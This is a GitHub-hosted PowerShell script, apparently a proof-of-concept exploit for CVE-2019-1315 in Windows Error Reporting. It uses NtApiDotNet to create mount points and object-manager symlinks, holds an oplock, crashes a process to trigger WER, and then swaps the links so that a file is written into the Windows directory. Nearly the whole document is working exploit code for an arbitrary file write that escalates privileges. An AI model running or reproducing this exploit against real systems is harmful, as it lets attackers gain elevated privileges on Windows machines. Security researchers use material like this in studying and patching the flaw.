-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2019-1315.ps1
80 lines (67 loc) · 3.38 KB
/
cve-2019-1315.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
Import-Module "C:\Users\Zhang Yuan\Desktop\CVE-2019-1315-master\NtApiDotNet.dll" -ErrorAction Stop
$TempReportDir = "$env:SystemRoot\Temp\RQ"
function Invoke-MoveFileUsingWER($Source, $Destination) {
Write-Host "Setting up dirs & files..."
New-Item -Type Directory -Path $TempReportDir -Force | Out-Null
Copy-Item "C:\Users\Zhang Yuan\Desktop\CVE-2019-1315-master\Report.wer" "$TempReportDir\Report.wer" -ErrorAction Stop
Copy-Item "C:\Users\Zhang Yuan\Desktop\CVE-2019-1315-master\Report.wer" "$TempReportDir\Report.wer.tmp" -ErrorAction Stop
Write-Host "Setting up pseudo-symlinks..."
[NtApiDotNet.NtFile]::CreateMountPoint("\??\$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e", "\RPC Control", $null)
$wer = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer", "\??\$TempReportDir\Report.wer")
$wer_tmp = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer.tmp", "\??\$TempReportDir\Report.wer.tmp")
$tmp_file = [NtApiDotNet.NtFile]::Open("\??\$TempReportDir\Report.wer.tmp", $null, [NtApiDotNet.FileAccessRights]::ReadAttributes, [NtApiDotNet.FileShareMode]::All, [NtApiDotNet.FileOpenOptions]::None)
Write-Host "Placing oplock..."
$task = $tmp_file.OplockExclusiveAsync()
Write-Host "Triggering WER..."
Start-Process -NoNewWindow powershell.exe "-Command `"[Environment]::FailFast('Error')`""
Write-Host "Waiting for oplock to trigger..."
$task.Wait()
Write-Host "Oplock triggered, switching symlinks..."
$wer.Dispose()
$wer_tmp.Dispose()
$wer = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer", "\??\$Destination")
$wer_tmp = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer.tmp", "\??\$Source")
Write-Host "Releasing Oplock..."
$tmp_file.AcknowledgeOplock([NtApiDotNet.OplockAcknowledgeLevel]::No2)
Write-Host "Waiting for wemgr process to finish..."
Sleep -Seconds 1
While ( -not (Get-Process -Name wemgr -ErrorAction SilentlyContinue) -eq $null ) {
Sleep -Milliseconds 500
}
Write-Host "Cleanup..."
$tmp_file.Close()
$wer.Dispose()
$wer_tmp.Dispose()
[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e") | Out-Null
Remove-Item -Path "$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e" -Force
Remove-Item -Path $TempReportDir -Recurse -Force
}
function Test-IsFileWritable($Path) {
$result = $False
Try {
[IO.File]::OpenWrite($Path).close()
$result = $True
} Catch {
$result = $False
}
return $result
}
# Use the bug to create a file in the Windows directory
function Test-Exploit($TargetFile) {
if($TargetFile -eq $null) {
$TargetFile = "$env:SystemRoot\evil.txt"
}
if(Test-Path $TargetFile) {
Write-Warning "Target file already exists, exiting"
return
}
New-Item -Type File -Path "$env:SystemRoot\Temp\testfile" -Value "test" -ErrorAction Stop | Out-Null
Invoke-MoveFileUsingWER -Source "$env:SystemRoot\Temp\testfile" -Destination $TargetFile
if (Test-IsFileWritable($TargetFile)) {
Write-Host -ForegroundColor Green "File $TargetFile successfully created!"
Get-Item $TargetFile
} else {
Write-Warning "File not created or not writable."
Remove-Item -Path "$env:SystemRoot\Temp\testfile" -Force -ErrorAction SilentlyContinue
}
}